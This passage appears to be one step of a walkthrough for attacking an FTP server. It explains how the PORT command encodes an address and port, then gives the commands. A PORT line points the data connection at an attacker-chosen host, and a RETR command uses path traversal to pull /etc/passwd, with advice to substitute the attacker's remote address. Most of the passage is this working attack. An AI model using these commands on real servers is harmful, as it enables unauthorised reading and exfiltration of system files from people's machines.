4-Set the attacker's IP address as the data-connection target and retrieve files. The PORT argument is h1,h2,h3,h4,p1,p2 with port = p1*256 + p2, so 127,0,0,1 below makes the server connect back to itself (fine for a local test; use the attacker's address, e.g. 10,0,0,5, when remote), and the 1,1002 form only yields 1258 if the server does not range-check p2 — the canonical encoding of 1258 is 4,234.
PORT 127,0,0,1,1,1002
RETR ../../../etc/passwd